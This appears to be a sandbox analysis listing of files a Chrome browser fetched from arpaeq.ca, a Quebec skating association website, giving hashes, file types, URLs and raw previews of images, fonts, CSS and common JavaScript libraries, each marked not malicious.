                  Size (bytes):167203
                  Entropy (8bit):7.93110980360419
                  Encrypted:false
                  SSDEEP:
                  MD5:D2A40E92377ECB3D3C74A5E6D4B516A1
                  SHA1:43ED328DA8A38548A869D98AE9797775F9B6CF7B
                  SHA-256:45120D35461F78A682D06FCBD6AB13A33B1D2BF52AF4EF8EF0AA7C77F1A52CD6
                  SHA-512:DC2B56265E2670A65D4F06F5577379E8EC5076EA608C6F5498E21EDC5C08FD0B9547547983B2F5E28826F09A315505E1EABF1668E2947F5354E3AE0A01D9C2F0
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/uploads/sites/2/2017/07/amqui.jpg
                  Preview:......JFIF.....,.,.....C....................................................................C.........................................................................H.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......G.}b..[$..*.O.Y.K.:...>..~....U.Kk.KM...,.Z;..;......o........8..k.O:.L.K........k7..O?6..l.H.).SO.rWU.S.._C.n.G...lC..W.T.e1.+..r.....b9mJ7.|...^..i.?x.l.....<..._]..P.Vk.!...5?..L.|..........+[/.2..<...e.........K...\$3).P...:.4[s%...L?.Y.....YN.....E~g..J..xo.&.Z.......I....<$|..O[..y.....C...Z..[.s...Z._...x....<....P..p@...c$..w;..[gXh...>..%./...
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 110x109, components 3
                  Category:dropped
                  Size (bytes):4076
                  Entropy (8bit):7.728146828089109
                  Encrypted:false
                  SSDEEP:
                  MD5:008B3459674CE7D04688A40AB89AA421
                  SHA1:3F7E632F089EAAD7700B4055B0079196288BB5CE
                  SHA-256:FA3AF81A56CFA2228A3A463F1FF31FF08975088883BD4ED9B7176225E3E110AC
                  SHA-512:BA55A002910A3EBF1BF4135B9032B92DCBC71EA112796E6BAEFC1D379A31344FCC63F10E264C9547BD46292A84B739FAAB9C17A35C53506F16FEA5F6205065D5
                  Malicious:false
                  Reputation:unknown
                  Preview:......JFIF..............Photoshop 3.0.8BIM.......h..(.bFBMD0a000a6b01000045020000f4030000150400006004000041080000490b0000920b0000b30b0000e30b0000ec0f0000....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......m.n.."...............................................................................0.B.9.We......a#.....:..g.>t....!....3.. /0..x\...+.......I`..i..C@..S.y,..Q.:..,..V....fiA.#.......@..x..|..^..G.....cO.....z.^.5. ..)a..........P......$............................. .0#%..............3*.9..'.AL...``U../.."....i.g..s......E....~g,B7v..b.Y.h.%...b.^U.f.R>#..+.Y+...W......dY.1.Ob.-*l0....V.........{g-...CWtZ.".aN...'....h.:J../.]...{~..5:.^J.^.Lq.C..r.T.JS_.t|.-..+K_x..z..._z..J.&.-.])..r........Q..S.z.....k.l`;.'#....8.U.9u.....(.\.)...o.FW<O..x,q..39...l ....e.....,.\q.4}.W(.Y.O.q........X.L.zb..n\A..ou.ru|4....U1..]..}....V.......[...l..*1%.rp..{.............
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (32033)
                  Category:downloaded
                  Size (bytes):37045
                  Entropy (8bit):5.174934618594778
                  Encrypted:false
                  SSDEEP:
                  MD5:5869C96CC8F19086AEE625D670D741F9
                  SHA1:430A443D74830FE9BE26EFCA431F448C1B3740F9
                  SHA-256:53964478A7C634E8DAD34ECC303DD8048D00DCE4993906DE1BACF67F663486EF
                  SHA-512:8B3B64A1BB2F9E329F02D4CD7479065630184EBAED942EE61A9FF9E1CE34C28C0EECB854458977815CF3704A8697FA8A5D096D2761F032B74B70D51DA3E37F45
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/themes/iron-man/ressources/bootstrap/bootstrap.min.js?ver=6.5.4
                  Preview:/*!. * Bootstrap v3.3.7 (http://getbootstrap.com). * Copyright 2011-2016 Twitter, Inc.. * Licensed under the MIT license. */.if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1||b[0]>3)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 4")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.event.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (23192)
                  Category:downloaded
                  Size (bytes):23409
                  Entropy (8bit):5.153837853310608
                  Encrypted:false
                  SSDEEP:
                  MD5:AB6B02EFEAF178E0247B9504051472FB
                  SHA1:8256575374F430476BDCD49DE98C77990229CE31
                  SHA-256:653E073E97423ADDA5BC3917A241EE8497DD38A48F14BCDE0098A4E54FD0FA5E
                  SHA-512:B6ABA9E6DE57C895E5BD7F1BFC4F69234B30180E00BA0B3316ABDD58049ADBFE3CE288F81D6ED46972B04669CC2CA169DD959E4F08E30A1E89E3402F754421AC
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/themes/iron-man/ressources/bootstrap/bootstrap-theme.min.css?ver=1.0
                  Preview:/*!. * Bootstrap v3.3.7 (http://getbootstrap.com). * Copyright 2011-2016 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.btn-danger,.btn-default,.btn-info,.btn-primary,.btn-success,.btn-warning{text-shadow:0 -1px 0 rgba(0,0,0,.2);-webkit-box-shadow:inset 0 1px 0 rgba(255,255,255,.15),0 1px 1px rgba(0,0,0,.075);box-shadow:inset 0 1px 0 rgba(255,255,255,.15),0 1px 1px rgba(0,0,0,.075)}.btn-danger.active,.btn-danger:active,.btn-default.active,.btn-default:active,.btn-info.active,.btn-info:active,.btn-primary.active,.btn-primary:active,.btn-success.active,.btn-success:active,.btn-warning.active,.btn-warning:active{-webkit-box-shadow:inset 0 3px 5px rgba(0,0,0,.125);box-shadow:inset 0 3px 5px rgba(0,0,0,.125)}.btn-danger.disabled,.btn-danger[disabled],.btn-default.disabled,.btn-default[disabled],.btn-info.disabled,.btn-info[disabled],.btn-primary.disabled,.btn-primary[disabled],.btn-success.disabled,.btn-success[disabled],.btn-warning.disabled
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):136163
                  Entropy (8bit):4.893919081960809
                  Encrypted:false
                  SSDEEP:
                  MD5:A13FA4B4981671BA31573A55C5CC9BCF
                  SHA1:50C684634473617DD732FAFD76E91659CCF47739
                  SHA-256:244B589B2DDC5914426D04DA9FC01E8BDE6A2F67C333C9657D74B19561D2567B
                  SHA-512:CAE381D657CE6DDAA6D1CB9CEDDE57ADB600A30119C6A73483D23F5C6B9BD8A8857B8D62742E20E2A838F60B7C3ABC2F8F2C08B5DF4F43F446F319941671DA83
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/themes/iron-man/ressources/stylesheets/nucleo-glyph.css?ver=1.0
                  Preview:/* --------------------------------..Nucleo Glyph Web Font - nucleoapp.com/.License - nucleoapp.com/license/.Created using IcoMoon - icomoon.io..-------------------------------- */.@font-face {. font-family: 'Nucleo Glyph';. src: url('../fonts/nucleo-glyph.eot');. src: url('../fonts/nucleo-glyph.eot') format('embedded-opentype'), url('../fonts/nucleo-glyph.woff2') format('woff2'), url('../fonts/nucleo-glyph.woff') format('woff'), url('../fonts/nucleo-glyph.ttf') format('truetype'), url('../fonts/nucleo-glyph.svg') format('svg');. font-weight: normal;. font-style: normal;.}./*------------------------..base class definition.-------------------------*/..nc-icon-glyph {. display: inline-block;. font: normal normal normal 14px/1 'Nucleo Glyph';. font-size: inherit;. speak: none;. text-transform: none;. /* Better Font Rendering */. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale;.}./*------------------------. change icon size.-------------------------*/
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 145 x 145, 8-bit/color RGB, non-interlaced
                  Category:downloaded
                  Size (bytes):39053
                  Entropy (8bit):7.988990597603025
                  Encrypted:false
                  SSDEEP:
                  MD5:50D6018C4142B6D39AAC41F3F0077174
                  SHA1:49C0A0D34614EC555C490E77EDE7FC645156541D
                  SHA-256:3FFB0A2C0C5DD320D531E6BF6F4AAD3725A9A182B2BAE4DE67C463A85F5EADC0
                  SHA-512:54FB23566414FF08B911B8A1536DA62667A95F3FE74FB5ED16075FEF68524A97821D721029EA919FC84EC18A7D8C5B6963239DE27AA84CCED00E7B6E9B71EF48
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/uploads/sites/2/2017/07/t%C3%A9miscouata.png
                  Preview:.PNG........IHDR.............L..t.. .IDATx^<.k.eYU&.}s...9........|b.I.J..G+....-.,mim...QZUj.U5....v[5,..ei....DAAD...$!!.dfdDF.;..}.s.^s~.c...;.g....k^v......0...........}......^....R.....>..s.v...........e.WG..H..T/...FJ*...&..H. ....4.)$....`.H$.^..........$..!....HJ3f....C...,.V...7.......yPH.]..f...A...`P..hH8.....VI..... ....!.% .....20U.J+.P.n{.n.[z.........E.J. .&.7.#._...6^rd._....9.........W..y._..9....s.'..k..w..AR.z...L.zF.M...j.2b....B...P..H.5`@f..V..N...*7A.rs...jfA......d......{...7..!wG&P.N...... R2$h.#...0$Id..h....."t.......D....D8..H....YcX.Ho..e..7#/40.`8. .R.(..T..@..sW.....D}..k......J..'...6..._......o.....8........J.].Q..B@.Y......"..... a@:.47s..LC M...",d4.&.0w...T..M&.....S....4D....N...Mc ..(@..H.MQ...E.{F@...g-.Y... @G.N......?B"Cne8....P"H.`.<YD...2z.(r3...i...<.;u.w.x.#Kw.s..I.T.R.*....]z.....]0b........,..P(T..Hr. ....y ..8..A."*.3d...".......P .+N.....L."..PF..ID.,....K.DR.......4..T...Zi..........."...
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 192x192, components 3
                  Category:dropped
                  Size (bytes):6844
                  Entropy (8bit):7.658662060000417
                  Encrypted:false
                  SSDEEP:
                  MD5:47B8EDA8E692D822D9CEAD9E27922399
                  SHA1:4477B559F3D8B95B022E5C033B89F25A17DB92C0
                  SHA-256:D37BFD595CB54708A80E8D8A5285C4A8C6F6E2F42EE29DA83EF64CE67D62C3A9
                  SHA-512:6D4FF7816902CFCAA5FCBC68428198A603F21D32820D1C350DF604F67F66EBBB9D3AD4700E0109994DB2DBCD449D4FC949B4B2DCE46170E244525B55FD2E7B6D
                  Malicious:false
                  Reputation:unknown
                  Preview:......JFIF..............Photoshop 3.0.8BIM..........g..z5dv-zKXECvX1NqYkDHL..(.bFBMD01000ac00300006d0500007f08000015090000a0090000b00e0000d71200007c1300001c1400008b140000bc1a0000....ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((...........".............................................................................................................hH..................
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65447)
                  Category:dropped
                  Size (bytes):87553
                  Entropy (8bit):5.262620498676155
                  Encrypted:false
                  SSDEEP:
                  MD5:826EB77E86B02AB7724FE3D0141FF87C
                  SHA1:79CD3587D565AFE290076A8D36C31C305A573D18
                  SHA-256:CB6F2D32C49D1C2B25E9FFC9AAAFA3F83075346C01BCD4AE6EB187392A4292CF
                  SHA-512:FC79FDB76763025DC39FAC045A215FF155EF2F492A0E9640079D6F089FA6218AF2B3AB7C6EAF636827DEE9294E6939A95AB24554E870C976679C25567AD6374C
                  Malicious:false
                  Reputation:unknown
                  Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with very long lines (3906)
                  Category:downloaded
                  Size (bytes):4135
                  Entropy (8bit):5.019202446945025
                  Encrypted:false
                  SSDEEP:
                  MD5:538BC2E72635D530FF6C68C1B2B1824D
                  SHA1:024E156770D53F86057793DD3C670D79437E4B83
                  SHA-256:03FCA5B10FD11E6C2D286828817CCEC088D1056D5AC0F52A1A53411CA8857F92
                  SHA-512:2D1EE041936E606635B7F8ACD6568F1CF7F6548C39EE7AC831A77AC71C104A17992A26132EADC099EE0995822807EE54850B8B8B0BB0C0E4B863B269CD3AD5D6
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/themes/iron-man/ressources/js/paginga.jquery.min.js?ver=6.5.4
                  Preview:/*!. * paginga - jQuery Pagination Plugin v0.8.1. * https://github.com/mrk-j/paginga. *. * Copyright 2017 Mark and other contributors. * Released under the MIT license. * https://github.com/mrk-j/paginga/blob/master/LICENSE. */.!function(t,s,e,i){"use strict";function a(s,e){this.element=s,this.settings=t.extend(!0,{},r,e),this._defaults=r,this._name=n,this._ready=!1,this.currentPage=this.settings.page,this.items=t(this.element).find(this.settings.itemsContainer+" "+this.settings.item),this.totalPages=Math.ceil(this.items.length/this.settings.itemsPerPage),this.totalPages<=1?t(this.element).find(this.settings.pager).hide():this.init()}var n="paginga",r={itemsPerPage:3,itemsContainer:".items",item:"> div",page:1,nextPage:".nextPage",previousPage:".previousPage",firstPage:".firstPage",lastPage:".lastPage",pageNumbers:".pageNumbers",maxPageNumbers:!1,currentPageClass:"active",pager:".pager",autoHidePager:!0,scrollToTop:{offset:15,speed:100},history:!1,historyHashPrefix:"page-"};t.extend(a
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (13479)
                  Category:downloaded
                  Size (bytes):13577
                  Entropy (8bit):5.272065782731947
                  Encrypted:false
                  SSDEEP:
                  MD5:9FFEB32E2D9EFBF8F70CAABDED242267
                  SHA1:3AD0C10E501AC2A9BFA18F9CD7E700219B378738
                  SHA-256:5274F11E6FB32AE0CF2DFB9F8043272865C397A7C4223B4CFA7D50EA52FBDE89
                  SHA-512:8D6BE545508A1C38278B8AD780C3758AE48A25E4E12EEE443375AA56031D9B356F8C90F22D4F251140FA3F65603AF40523165E33CAE2E2D62FC78EC106E3D731
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
                  Preview:/*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],a=1;a<=3;a++){if(+o[a]<+n[a])return 1;if(+n[a]<+o[a])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.4.1";var t=Object.create(null);s.migrateDisablePatches=function(){for(var e=0;e<arguments.length;e++)t[arguments[e]]=!0},s.migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")||n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migrateWarnings
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 200x200, components 3
                  Category:downloaded
                  Size (bytes):9101
                  Entropy (8bit):7.783747347632742
                  Encrypted:false
                  SSDEEP:
                  MD5:DE78F2E2FB01D7DE8097D2753590AC91
                  SHA1:0962300797384A3EC3E5C81450D85C2F8E92E024
                  SHA-256:A279326E4FD86ED5C461942E494459ED85457B5CCBBD11A38851510BCF65D002
                  SHA-512:F8E19A894F31A6715917DF11DC0DA162AC23841E6EBF206876E7E64A33F79C992A34B02917277EC113950B4102A40D4128FF5F9F2BD52D66DC6D694CFF5EFA31
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/uploads/sites/2/2017/07/rimouski.jpg
                  Preview:......JFIF..............Photoshop 3.0.8BIM.......g..(.bFBMD01000aaa03000036060000bd090000c90b00005f0d0000041300000a180000c3180000981a0000e81b00008d230000.....ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."...........................................................................................................>}..P.\m...+>....`....kY...'s.Sh......l..kd..}
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 200x200, components 3
                  Category:dropped
                  Size (bytes):6965
                  Entropy (8bit):7.673899258135479
                  Encrypted:false
                  SSDEEP:
                  MD5:8820F3276905172A698DA6AA713E48D3
                  SHA1:0206AB6DE0FA95C8EBDD686FD66A8F2FDEBFF00A
                  SHA-256:0C43BE33E3B3B0DA7B2A749A4C9502F3F035A7C38F383227E3AC9325B0442522
                  SHA-512:7CC5879A0BD8F1E15AB6696D8CFC2BFF3DC2CAC242CC43CFDEB3C4DFE9A08D19A18B34E97A9761D6FFF6E85E17AD53661759DC7E07892B28E2BA1D184F38E6F3
                  Malicious:false
                  Reputation:unknown
                  Preview:......JFIF..............Photoshop 3.0.8BIM.......g..(.bFBMD01000aab030000b0050000db08000055090000190a0000ff0e00004b130000f8130000691400000d150000351b0000.....ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((...........".........................................................................................................................a)...._...;....]..L.N>..Q>......
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 101 x 100, 8-bit/color RGBA, non-interlaced
                  Category:downloaded
                  Size (bytes):14725
                  Entropy (8bit):7.971789424306446
                  Encrypted:false
                  SSDEEP:
                  MD5:EC4C0B5A428A4DF56D916FD189291F6E
                  SHA1:72CD87902A63DA25E558B913665FD1E6DB74B6D0
                  SHA-256:E9EE15F7EA2DA858C4D2606A119B272519B67E8E4C3D631633A1EBA4F66019BE
                  SHA-512:348D6221194E05CCD9F0B2ABEA64F438B959825A7576103645DE17EB21EE17BBAE68AE62FF53342310C00D41A00D5F56725F4296E5CB18FA80156336A8540407
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/uploads/sites/2/2017/07/isu.png
                  Preview:.PNG........IHDR...e...d...... .j....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:628AF34F6E5111E78D04C72DBC0A47E9" xmpMM:DocumentID="xmp.did:628AF3506E5111E78D04C72DBC0A47E9"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:628AF34D6E5111E78D04C72DBC0A47E9" stRef:documentID="xmp.did:628AF34E6E5111E78D04C72DBC0A47E9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..v5..5.IDATx..}..dU....W..sO.3 .a...P....PWD...kZ..].._...]."....J.....#...C..f......^..?....=...n...z..'~
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (8586), with CRLF, LF line terminators
                  Category:downloaded
                  Size (bytes):54719
                  Entropy (8bit):5.043233101522323
                  Encrypted:false
                  SSDEEP:
                  MD5:EFE90D679287AF73002C98F8E7859BA8
                  SHA1:280649119063E2585112591F9194F50F758B719C
                  SHA-256:D07B67240432CCD79C18E306DDC20945BF62ED17AE905986E29B93031E086628
                  SHA-512:E026F16B5382A3811A588F2C6D0D3886A492A1D3F30B7E9456C353E739B118873F52B479F5995D4340367B187A546A2D7A5BDC3B3C79E36D8A04799579DE966A
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/
                  Preview:...<!DOCTYPE html>..<html lang="fr-CA" id="tt-can">....<head>.. <meta charset="viewport">.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1">.. <title>Accueil - ARPAEQ</title><link rel="preload" as="image" href="https://arpaeq.ca/wp-content/uploads/sites/2/2017/07/logo-patinage-quebec.png" fetchpriority="high">.. <link rel="profile" href="https://gmpg.org/xfn/11">.. <link rel="profile" href="https://arpaeq.ca/xmlrpc.php">.... [if lt IE 9]>.. <script src="https://html5shiv.googlecode.com/svn/trunk/html5.js"></script>.. <![endif]-->.... <meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />... This site is optimized with the Yoast SEO plugin v22.9 - https://yoast.com/wordpress/plugins/seo/ -->..<link rel="canonical" href="https://arpaeq.ca/" />..<meta property="og:locale" content="fr_CA" />..<meta property="og:type" content="website" />..<meta propert
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format, CFF, length 2172, version 1.0
                  Category:downloaded
                  Size (bytes):2172
                  Entropy (8bit):7.636235644741916
                  Encrypted:false
                  SSDEEP:
                  MD5:4AF239C52C5373D960CAC40119BA7D2B
                  SHA1:AF7AA1E10D4E14F1E86050F26E09B66032CE0CDF
                  SHA-256:A33C47D1401A06C764767DAA647355C7CD5EBEAC3C4EA90DF98F906E33E71D43
                  SHA-512:7BA0E21375B472E67BE3ECD748276485D0F6C1D24DB4118EC4E5B871687CDE0B0985BD3EB805399CA1D0EFBDCEF3AD6B0D25992B48C0D02FA0E9879FD76F1D34
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/themes/iron-man/ressources/fonts/TTC-icon.woff
                  Preview:wOFFOTTO...|.......0........................CFF .......J....|...FFTM...T........u..^GDEF...p....... .6..OS/2.......G...`P.^.cmap.......F...J...\head... ...)...6.}..hhea...L.......$./..hmtx...d............maxp...|..........P.name.............|..post...l....... ....x.mT]l.T...q..t.......&..6...*.~*...e..-I..N..u...i.$...8q.(..H.vZ[..U..Z_&..Q......x..8.+..@.....s..{.......z...&...IY......m.....p....]....z.....h....O7...d.`........L..5.`.7.`.Z..6c..0u.&..k.vb.`...X;v..J9{.q..i...:.Iy}V.....I........{}...Gw..O....c.?..i.....8..<....x......G.n...5........*g.....p .b,.\..G......".H......"....+.....|b^.%.X...I>...Q.!9...r3s..Q..QP..I.2..I.e..+,!...<1:d.cKCR.....I..4....Uu.E|.7:.j.Gj..V.....a...}=4.V.K.S\..y...../.`.s.8..e`L..!)...b:......"K......d. .&...eXf...b.f.....C....'1rt$..'".....(..H(...A..u........lR.!.q..B......k....X5LI......`..^...'6.!..C...k).U..F%.U.FU.8L. .n..w.to/..n....a.-tK.I.(...2_.2p.!.E.,....dA*.e....Du.+.e..[.'.R........{hC.[...Yj.R...i.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with very long lines (9765)
                  Category:dropped
                  Size (bytes):9876
                  Entropy (8bit):5.379478646021313
                  Encrypted:false
                  SSDEEP:
                  MD5:9517BACA43CD4E9CB23FF337FBC1BAA1
                  SHA1:38557BEF17C33E172BC8E1670CD302D91622DFAD
                  SHA-256:3D61CE954CDCF7AA4C73C4E1C112173E7F321F834E2EEE36450D1BF52A67A459
                  SHA-512:9519DE43E95DD71971407B5516088169544D25A9936B1876F770E906FD116034C820090F01C609E58CF4CF793D34B0B82FA0DBA2F48B65F1A9FC11D134552BD4
                  Malicious:false
                  Reputation:unknown
                  Preview:/*! PhotoSwipe Default UI - 4.1.1 - 2015-12-24.* http://photoswipe.com.* Copyright (c) 2015 Dmitry Semenov; */.!function(a,b){"function"==typeof define&&define.amd?define(b):"object"==typeof exports?module.exports=b():a.PhotoSwipeUI_Default=b()}(this,function(){"use strict";var a=function(a,b){var c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v=this,w=!1,x=!0,y=!0,z={barsSize:{top:44,bottom:"auto"},closeElClasses:["item","caption","zoom-wrap","ui","top-bar"],timeToIdle:4e3,timeToIdleOutside:1e3,loadingIndicatorDelay:1e3,addCaptionHTMLFn:function(a,b){return a.title?(b.children[0].innerHTML=a.title,!0):(b.children[0].innerHTML="",!1)},closeEl:!0,captionEl:!0,fullscreenEl:!0,zoomEl:!0,shareEl:!0,counterEl:!0,arrowEl:!0,preloaderEl:!0,tapToClose:!1,tapToToggleControls:!0,clickToCloseNonZoomable:!0,shareButtons:[{id:"facebook",label:"Share on Facebook",url:"https://www.facebook.com/sharer/sharer.php?u={{url}}"},{id:"twitter",label:"Tweet",url:"https://twitter.com/intent/tweet?text={{text}}&url={{u
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1170x594, components 3
                  Category:downloaded
                  Size (bytes):167195
                  Entropy (8bit):7.958593734993408
                  Encrypted:false
                  SSDEEP:
                  MD5:6B8B9D279490A910B2B4B30D6F95A8DD
                  SHA1:C5C8462B2420C6809C4AFEFDB4A21DEB41EDA9E4
                  SHA-256:32A144E249182FF3800C74A0A445E80B8FC2DE53E09274572DB2BA78FB180DB5
                  SHA-512:DD60B4BDEED416C0FAEC0DCF1A4032D937FB70B9FE440B3A783141394856C6EB19EF99510EDD2FEF41493B1B480647B41645DE41F70D7CFEF7725427D5D39D14
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/uploads/sites/2/2024/03/Jeux-2024.jpg
                  Preview:......JFIF.....H.H.....C....................................................................C.......................................................................R...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....=)i.._..&.._X.??L......B.....d.%O.q8..........|..&.l..|x..c..^.....v...|,........\.....O.|..{.[Qc.j.~.p...G..|.+{.w......H/..k.i..w.....xU$m.7...7T..~.....#.....io(.W.}...h...z.Wa...FUC....bI.1Pw....n...,{.....I...G...f..VE.......V...1...|..]....5.d>.....Z..b.X0h....h[...6z..Y..l6... U..d..EQ..W9.....d.=TSn .'1...f.j..X.....5bK...y.......k..eq.z...7_p
